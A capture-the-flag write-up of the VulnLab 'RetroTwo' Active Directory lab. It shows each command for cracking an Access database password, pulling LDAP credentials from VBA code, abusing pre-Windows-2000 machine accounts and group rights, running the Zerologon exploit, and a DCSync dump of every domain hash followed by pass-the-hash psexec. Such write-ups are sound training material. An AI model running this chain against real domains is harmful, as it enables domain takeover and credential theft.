RetroTwo VulnLab
RetroTwo VulnLab Writeup
RetroTwo is an easy machine from VulnLab which is hosted on HackTheBox it is based on Active Directory which starts off with a publicly accessible SMB Share containing a Microsoft access database file using microsoft access we open this file with a password and find a VBA script containing credentials of an active directory user. Then by enumerating the domain we found 2 PreWindows-2000 machine accounts by resetting a password of one of the accounts we get control over other 2 accounts and then by RDP we retrieve user flag, and for the privesc part this is an old machine with old DC, so doing zerologon attack on the DC helps to get DCSync and finally dumping the administrator hash to gain Administrator privileges finally pwning this machine.
Initial Enumeration
As always we are gonna start off with the rustmap to find the open ports and services.
1
rustmap.py -ip 10.129.239.3
Looking at results we have the domain controller name and the hostname of the box which are BLN01 and retro2.vl.
Adding these to our /etc/hosts file.
SMB Enumeration
Starting with the SMB enumeration, lets check that we have guest access.
1
nxc smb retro2.vl -u '.' -p '' --shares
Connecting to the Public Share using smbclient.
1
smbclient //retro2.vl/Public -U '.'%
There is only 1 file present downloading it.
This is a Microsoft Access database file.
Cant able to open the file with the mdb-tools so I opened it in my windows machine using Microsoft Access.
But its asking for a password.
Lets crack it using john the ripper.
Converting the file in the JTR format
1
office2john staff.accdb
Now cracking this hash.
1
john --wordlist=/usr/share/wordlists/rockyou.txt staff.hash
John was able to crack it and the password is class08.
After cracking it and opening it in Access.
The staff members table was empty.
So I exported the staff module and found this following VBA piece of code.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
Attribute VB_Name = "Staff"
Option Compare Database
Sub ImportStaffUsersFromLDAP()
Dim objConnection As Object
Dim objCommand As Object
Dim objRecordset As Object
Dim strLDAP As String
Dim strUser As String
Dim strPassword As String
Dim strSQL As String
Dim db As Database
Dim rst As Recordset
strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
strUser = "retro2\ldapreader"
strPassword = "ppYaVcB5R"
Set objConnection = CreateObject("ADODB.Connection")
objConnection.Provider = "ADsDSOObject"
objConnection.Properties("User ID") = strUser
objConnection.Properties("Password") = strPassword
objConnection.Properties("Encrypt Password") = True
objConnection.Open "Active Directory Provider"
Set objCommand = CreateObject("ADODB.Command")
objCommand.ActiveConnection = objConnection
objCommand.CommandText = "<" & strLDAP & ">;(objectCategory=person);cn,distinguishedName,givenName,sn,sAMAccountName,userPrincipalName,description;subtree"
Set objRecordset = objCommand.Execute
Set db = CurrentDb
Set rst = db.OpenRecordset("StaffMembers", dbOpenDynaset)
Do Until objRecordset.EOF
rst.AddNew
rst!CN = objRecordset.Fields("cn").Value
rst!DistinguishedName = objRecordset.Fields("distinguishedName").Value
rst!GivenName = Nz(objRecordset.Fields("givenName").Value, "")
rst!SN = Nz(objRecordset.Fields("sn").Value, "")
rst!sAMAccountName = objRecordset.Fields("sAMAccountName").Value
rst!UserPrincipalName = Nz(objRecordset.Fields("userPrincipalName").Value, "")
rst!Description = Nz(objRecordset.Fields("description").Value, "")
rst.Update
objRecordset.MoveNext
Loop
rst.Close
objRecordset.Close
objConnection.Close
Set rst = Nothing
Set objRecordset = Nothing
Set objCommand = Nothing
Set objConnection = Nothing
MsgBox "Staff users imported successfully!", vbInformation
End Sub
I found the credentials of the Ldapreader user.
Saving them to a creds.txt file.
LDAP Enumeration
Now lets just authenticate with the credentials to validate them.
1
nxc ldap retro2.vl -u ldapreader -p ppYaVcB5R
We have valid credentials !!
So lets enumerate the users in the domain.
1
nxc ldap retro2.vl -u ldapreader -p ppYaVcB5R --users
RID Cycling Attack
We have valid credentials to the domain let us perform RID Bruteforce attack using NetExec.
1
nxc smb retro2.vl -u ldapreader -p ppYaVcB5R --rid-brute
Saved these users to usernames.txt file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Administrator
Guest
krbtgt
admin
staff
Julie.Martin
Clare.Smith
Laura.Davies
Rhys.Richards
Leah.Robinson
Michelle.Bird
Kayleigh.Stephenson
Charles.Singh
Sam.Humphreys
Margaret.Austin
Caroline.James
Lynda.Giles
Emily.Price
Lynne.Dennis
Alexandra.Black
Alex.Scott
Mandy.Davies
Marilyn.Whitehouse
Lindsey.Harrison
Sally.Davey
ADMWS01$
inventory
services
ldapreader
FS01$
FS02$
Bloodhound
Now lets collect the bloodhound data using rusthound-ce since we have valid credentials.
1
rusthound-ce -d retro2.vl -u 'ldapreader' -p 'ppYaVcB5R' -f bln01.retro2.vl -z
Uploaded the zip to bloodhound-ce for ingestion.
Marking our ldapreader user as owned in bloodhound.
We didn’t find any outbound object control options from our ldapreader account.
So I enumerated the domain more, since this is RetroTwo, I found 2 machine accounts in the domain FS01$ and FS02$, which gave me hint that maybe they are the old machines probably running PreWindows2000.
So lets test that using a quick SMB Authentication.
1
2
nxc smb retro2.vl -u 'FS01$' -p fs01
nxc smb retro2.vl -u 'FS02$' -p fs02
And yes I was right.
For more info about this read about in Retro VL Writeup.
https://a45hw1n.github.io/posts/retro-vl
Exploitation
FS01$
So lets quickly reset the passwords of one of the machines.
Because of this.
Resetting the password of FS01$ machine account.
You this step is also done in Retro machine writeup please refer to it.
https://a45hw1n.github.io/posts/retro-vl/
1
/usr/share/doc/python3-impacket/examples/changepasswd.py retro2.vl/'FS01$':fs01@bln01.retro2.vl -newpass 'aashwin10!' -protocol kpasswd
Now we have control over FS01$ account which is a part of Domain Computers and has GenericWrite over FS02$ and ADMWS01.
FS02$
Now lets change the password of FS02$ machine account too and then perform the shadow credential attack on both of them to get their NT hashes.
1
/usr/share/doc/python3-impacket/examples/changepasswd.py retro2.vl/'FS02$':fs02@bln01.retro2.vl -newpass 'aashwin10!' -protocol kpasswd
Lets perform a ShadowCredentials attack on both the machine accounts.
Cannot perform this attack due to above reasons.
ADMWS01$
Since we have genericWrite on ADMWS01$ as FS01$.
Lets reset the password of ADMWS01$ account.
1
bloodyAD -d retro2.vl -u 'FS01$' -p 'aashwin10!' --dc-ip 10.129.239.24 set password 'ADMWS01$' 'aashwin10!'
So we now own ADMWS01$ machine account.
ADMWS01$ → SERVICES
Looking at the bloodhound data ADMWS01$ can add itself to the SERVICES group.
Lets add ourselves to the SERVICES group.
1
bloodyAD -d retro2.vl -u 'ADMWS01$' -p 'aashwin10!' --dc-ip 10.129.239.24 add groupMember 'Services' 'ADMWS01$'
SERVICES → RemoteDesktopUsers
The SERVICES group is a part of REMOTE DESKTOP USERS.
RDP as ADMWS01$
Lets RDP into the domain.
1
xfreerdp /v:bln01.retro2.vl /u:'ADMWS01$' /p:'aashwin10!' /tls-seclevel:0
But we lack permissions to login with this machine account.
Ldapreader → SERVICES
So I decided to add Ldapreader to the Services group to able to RDP as him.
1
bloodyAD -d retro2.vl -u 'ADMWS01$' -p 'aashwin10!' --dc-ip 10.129.239.24 add groupMember 'Services' 'ldapreader'
RDP as LDAPReader
1
xfreerdp /v:bln01.retro2.vl /u:'ldapreader' /p:'ppYaVcB5R' /tls-seclevel:0
And we are in !!
Going to MyComputer and then *C:* drive we retrive our first flag.
Privilege Escalation
Since this is an old DC, it is probably vulnerable to the zerologon vulnerability discovered by Secura in 2020.
You can find the POC here:
https://github.com/dirkjanm/CVE-2020-1472
1
python3 cve-2020-1472-exploit.py bln01 10.129.239.24
The target is vulnerable and we set the password to an Empty String.
Means we can easily DCSync the Domain Controller.
1
impacket-secretsdump -just-dc retro2.vl/BLN01$:@10.129.239.24
The following output we received.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c06552bdb50ada21a7c74536c231b848:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e242a90fb9503f383255a4328e75756:::
admin:1000:aad3b435b51404eeaad3b435b51404ee:49c31c8f60320b9f416bc248231c008c:::
Julie.Martin:1105:aad3b435b51404eeaad3b435b51404ee:cf4999af837f40d72d1c5bcec27ba9b6:::
Clare.Smith:1106:aad3b435b51404eeaad3b435b51404ee:a7c82ec08414f0c54637fad20b9aac9e:::
Laura.Davies:1107:aad3b435b51404eeaad3b435b51404ee:ee74607fad6d8c51b0d488e322f82317:::
Rhys.Richards:1108:aad3b435b51404eeaad3b435b51404ee:09377f210fdbdcda6f97eda91ddc6879:::
Leah.Robinson:1109:aad3b435b51404eeaad3b435b51404ee:6333c620221c04d8fb5b6d7ca8b6d6d7:::
Michelle.Bird:1110:aad3b435b51404eeaad3b435b51404ee:c823220a9bda3ca70ebe7362187c9004:::
Kayleigh.Stephenson:1111:aad3b435b51404eeaad3b435b51404ee:a78835f0139b3b206f9598fe9c18d707:::
Charles.Singh:1112:aad3b435b51404eeaad3b435b51404ee:432119e62a10aff8c8200e4f45e772a0:::
Sam.Humphreys:1113:aad3b435b51404eeaad3b435b51404ee:3c1508fc774de1e6040c68b41a17fdee:::
Margaret.Austin:1114:aad3b435b51404eeaad3b435b51404ee:c6ebda46b0b014eda3ffcb8d92d179d9:::
Caroline.James:1115:aad3b435b51404eeaad3b435b51404ee:80835fee4ce88524f63a0ecf60870ac0:::
Lynda.Giles:1116:aad3b435b51404eeaad3b435b51404ee:dbf17856bd378ec410c20b98a749571f:::
Emily.Price:1117:aad3b435b51404eeaad3b435b51404ee:9cdf1d59674a6ddfedef2ae2545d3862:::
Lynne.Dennis:1118:aad3b435b51404eeaad3b435b51404ee:4b690295089b91881633113f13c866ee:::
Alexandra.Black:1119:aad3b435b51404eeaad3b435b51404ee:3349f04c2fdcf796a66c37b2a7658ae6:::
Alex.Scott:1120:aad3b435b51404eeaad3b435b51404ee:200155446e3b3817e8bc857dfe01b58c:::
Mandy.Davies:1121:aad3b435b51404eeaad3b435b51404ee:c144842c62c3051b8f1b8467ec62ef1f:::
Marilyn.Whitehouse:1122:aad3b435b51404eeaad3b435b51404ee:097b5b5b97e2a3b07db0b3deac5cd303:::
Lindsey.Harrison:1123:aad3b435b51404eeaad3b435b51404ee:261b8b9c79b19345e8ea15dcdfc03ecd:::
Sally.Davey:1124:aad3b435b51404eeaad3b435b51404ee:78ac830ac29ae1df8fa569b39515d5a5:::
retro2.vl\inventory:1128:aad3b435b51404eeaad3b435b51404ee:46b019644dde01251e7044a3d4185bd1:::
retro2.vl\ldapreader:1130:aad3b435b51404eeaad3b435b51404ee:fe63aaefd1cfd29d7cc5c14321a725f3:::
BLN01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ADMWS01$:1127:aad3b435b51404eeaad3b435b51404ee:7743e5e4f86ed6f20083e5849378c660:::
FS01$:1131:aad3b435b51404eeaad3b435b51404ee:7743e5e4f86ed6f20083e5849378c660:::
FS02$:1132:aad3b435b51404eeaad3b435b51404ee:7743e5e4f86ed6f20083e5849378c660:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:1de3d3d429521d8d99e4b4b31da5ce5f993902a8876adaabdd9449a5256c220f
krbtgt:aes128-cts-hmac-sha1-96:8250eee9083a48b1fca675d7d0ce3699
krbtgt:des-cbc-md5:d334438313291520
admin:aes256-cts-hmac-sha1-96:055842e1ada4e1cba5bd0286a4fa9de9337b0324104adc533aabea23ddc353b7
admin:aes128-cts-hmac-sha1-96:1e0f4d9eb0ea70d225db67d53f297934
admin:des-cbc-md5:70d0624397c708df
Julie.Martin:aes256-cts-hmac-sha1-96:5428f080b3303d74da2a344d0b799d97dfb5795fee1d1ed64b3e7e9cc3cbec5c
Julie.Martin:aes128-cts-hmac-sha1-96:8757cfac9fd8af791bd8f5c9b8bfac0c
Julie.Martin:des-cbc-md5:0e85dca2e3e6291a
Clare.Smith:aes256-cts-hmac-sha1-96:65c7c8d4e980f1e63fab4af0fb8b8dc17e9bddff20e7b8bb5fa5c1690561f406
Clare.Smith:aes128-cts-hmac-sha1-96:54cc3c8caadcd6e9b605d2da4c96e55f
Clare.Smith:des-cbc-md5:61fe8f52b39ecb9d
Laura.Davies:aes256-cts-hmac-sha1-96:9ada131aebb330b859770d3177e4b6bf2e37e994d83761e83c296e3dd0549fa4
Laura.Davies:aes128-cts-hmac-sha1-96:c00363c7acdb7e6efb47e90c46eb73f5
Laura.Davies:des-cbc-md5:31d670ec9b16c762
Rhys.Richards:aes256-cts-hmac-sha1-96:805f8d2f3f6c92cbf7bf0fc2449ec03ac8446b0f595aeb68d5e34932bdf1f9a8
Rhys.Richards:aes128-cts-hmac-sha1-96:baeaf7d174ea76419d381e545935aef2
Rhys.Richards:des-cbc-md5:6b0e2cf7ae3de3e3
Leah.Robinson:aes256-cts-hmac-sha1-96:90848db193370cc832b199b27137ef581b78eddc2d5f635a0e01e0b1c514c326
Leah.Robinson:aes128-cts-hmac-sha1-96:6aa30b143db0f0e65517bb062a4fe6c7
Leah.Robinson:des-cbc-md5:d9b6abe30e851f9b
Michelle.Bird:aes256-cts-hmac-sha1-96:a76108bec6385a4469d5eff1d4d5ccaaf066b981d56d3df82f058c1b66b9c653
Michelle.Bird:aes128-cts-hmac-sha1-96:ca9fdc76c484d05397433e90c2d9b84c
Michelle.Bird:des-cbc-md5:79b016e69ec4b59b
Kayleigh.Stephenson:aes256-cts-hmac-sha1-96:6c11e6b4e5e263bbb7b6859b7e4380bf9fce222de2e51da9f033c370d1bd3b34
Kayleigh.Stephenson:aes128-cts-hmac-sha1-96:69ced3d12c16659ae2fdaa2bab6df2f3
Kayleigh.Stephenson:des-cbc-md5:ce7ae949452a1997
Charles.Singh:aes256-cts-hmac-sha1-96:0eb1f6abc867ac77603b9b6f8b454abfef421c6eec2518e28e0e40ee3efb6215
Charles.Singh:aes128-cts-hmac-sha1-96:3cee7675dd2615a5214127faacb30930
Charles.Singh:des-cbc-md5:9125dcd6d3ad4fb6
Sam.Humphreys:aes256-cts-hmac-sha1-96:878ea36ddce6a9e5b050021e757669ff94b8b3367bcb9461dc83cdbcc1342b77
Sam.Humphreys:aes128-cts-hmac-sha1-96:102e420c74d34cda602282342c555b72
Sam.Humphreys:des-cbc-md5:5b5bc1a8683816c4
Margaret.Austin:aes256-cts-hmac-sha1-96:500b6f66a68c384b76ee63fb2d309278638c4eaa2903a7555b7f0a63ed2da30e
Margaret.Austin:aes128-cts-hmac-sha1-96:2bb2066bea0481bf7c9fae65a908bb64
Margaret.Austin:des-cbc-md5:077f91679bcb6dda
Caroline.James:aes256-cts-hmac-sha1-96:0ddabfe9574396df083878375b0e7100c4466698a1d0fa812a07b0bc17f44583
Caroline.James:aes128-cts-hmac-sha1-96:574766e01691af43749a8c0cc566af0f
Caroline.James:des-cbc-md5:29574998cd13f813
Lynda.Giles:aes256-cts-hmac-sha1-96:dc9ca6bdfd27960e9c5700864e0fec0a388f903747d79c61d773cc6e24ea2253
Lynda.Giles:aes128-cts-hmac-sha1-96:c2eaf2f31cb78d18ac51c1c8b0cd496d
Lynda.Giles:des-cbc-md5:62b9082f6e1ab92a
Emily.Price:aes256-cts-hmac-sha1-96:37d0c3e846f44b0c0afe005b178c1e2689ab8cf227c60345e4d83af3bedcd908
Emily.Price:aes128-cts-hmac-sha1-96:87331a1b619dc0b817a00bd7882973b3
Emily.Price:des-cbc-md5:d592c7dce0386489
Lynne.Dennis:aes256-cts-hmac-sha1-96:ec46f167dac2f0763fa4891b4ec7204e8b791b6e757b88f13eaf0a3069d91520
Lynne.Dennis:aes128-cts-hmac-sha1-96:a6de42302e21936f728c6340cc3924b4
Lynne.Dennis:des-cbc-md5:2337fe088083d561
Alexandra.Black:aes256-cts-hmac-sha1-96:63e7bcd8c3827fafac984927c8ee7a410644603b87df03a73d93a5d83d351199
Alexandra.Black:aes128-cts-hmac-sha1-96:f7f77113ff7a8e070f8d961a973afa80
Alexandra.Black:des-cbc-md5:70dcdcef4a584c67
Alex.Scott:aes256-cts-hmac-sha1-96:56e28035bf0e773b08eac63f2ded3b77150f4662335fecfe0d167439954c3c6c
Alex.Scott:aes128-cts-hmac-sha1-96:1743a9bfda5a6d4937e10833aa94261a
Alex.Scott:des-cbc-md5:c47a9e6475452f7c
Mandy.Davies:aes256-cts-hmac-sha1-96:f9ab0b0127d819088c6e20f2a22b62e658e65413634a982e7a03029860b5fbbb
Mandy.Davies:aes128-cts-hmac-sha1-96:775c402ad1b82a01d00d24cdce2f0cff
Mandy.Davies:des-cbc-md5:0dcb62cd49a4070b
Marilyn.Whitehouse:aes256-cts-hmac-sha1-96:070d0ec84b01cee1f4e6f7fde70978e38dd06e9718d29165f7b34687f2bfc57d
Marilyn.Whitehouse:aes128-cts-hmac-sha1-96:983446f761745cac59cfdf6533be1e62
Marilyn.Whitehouse:des-cbc-md5:b34fad80d6583d52
Lindsey.Harrison:aes256-cts-hmac-sha1-96:df8a640121c7931e4b1e24a903831bbdb2ceca342bc32df0d642be5ad59aebaa
Lindsey.Harrison:aes128-cts-hmac-sha1-96:9c0600e456143cb3a958434295e230c5
Lindsey.Harrison:des-cbc-md5:df4afde6a83d586d
Sally.Davey:aes256-cts-hmac-sha1-96:ad994860516e89a93515d9934fbc92ae0e18ac10a4179ce0b5e856d21239c07d
Sally.Davey:aes128-cts-hmac-sha1-96:1bd25ea0251be749c0b9ff10c0443728
Sally.Davey:des-cbc-md5:8940a2cde9fb45f1
retro2.vl\inventory:aes256-cts-hmac-sha1-96:251d2610ccb122fbefecbc0bad2a0f1ecffe39e48734d40fc31f9d6c32d9c3a6
retro2.vl\inventory:aes128-cts-hmac-sha1-96:6a4787b610d341b0d99758c8dd80a405
retro2.vl\inventory:des-cbc-md5:ad08041f6b0861a7
retro2.vl\ldapreader:aes256-cts-hmac-sha1-96:1f38605e159b9f10ba465530aa4ea2d9fd5429b3bf348fa8559b5acc647c0b32
retro2.vl\ldapreader:aes128-cts-hmac-sha1-96:000256e0522cc3cd2f52c6bfe1698368
retro2.vl\ldapreader:des-cbc-md5:8908762379fdfdae
BLN01$:aes256-cts-hmac-sha1-96:ffd22246332c76f0831bbae3acbcf7d9160e780f77ecbf6322ec536b8744a280
BLN01$:aes128-cts-hmac-sha1-96:00489881457ca7f5ba4dac2e1395fd44
BLN01$:des-cbc-md5:0886138c15a70157
ADMWS01$:aes256-cts-hmac-sha1-96:f5544c7751a1eff130453c781bca6efa5f50e39c41d86794a40999d3274e69dc
ADMWS01$:aes128-cts-hmac-sha1-96:aaa5f993a84a7684788ad0e867caa939
ADMWS01$:des-cbc-md5:d63268efd65ba20e
FS01$:aes256-cts-hmac-sha1-96:02282d48a002cbedd722bd5e25c65cf60e3c90f4b3f5202d6cfae73a36bbc3cf
FS01$:aes128-cts-hmac-sha1-96:b7e4bcfe86263314d53fd657ba99ed77
FS01$:des-cbc-md5:7aaec294018925b9
FS02$:aes256-cts-hmac-sha1-96:7768ec02acaf881fd3e6c0a7ca3431e0e1e53054711649ec05baf2cfa7c1458e
FS02$:aes128-cts-hmac-sha1-96:1fb1a56a82c449a59626b2cf11b6e5b2
FS02$:des-cbc-md5:bc548375b55b792f
[*] Cleaning up...
Shell as Administrator
After dumping all the hashes from the domain, we can use psexec.py to get a shell on the DC.
I tried to verify the Administrator hash using Netexec but it showed me this.
1
nxc rdp retro2.vl -u Administrator -H c06552bdb50ada21a7c74536c231b848
Because our DC is Datacenter 2008, lets try with the SMB connection.
1
nxc smb retro2.vl -u Administrator -H c06552bdb50ada21a7c74536c231b848 --shares
And yeah we have READ, WRITE access to the Admin$ share and it also says pwned!
Now lets get a shell on DC.
1
impacket-psexec -hashes :c06552bdb50ada21a7c74536c231b848 retro2.vl/Administrator@10.129.239.24
Grabbing our root.txt and submitting it !
Rooted!
Thanks for reading 😊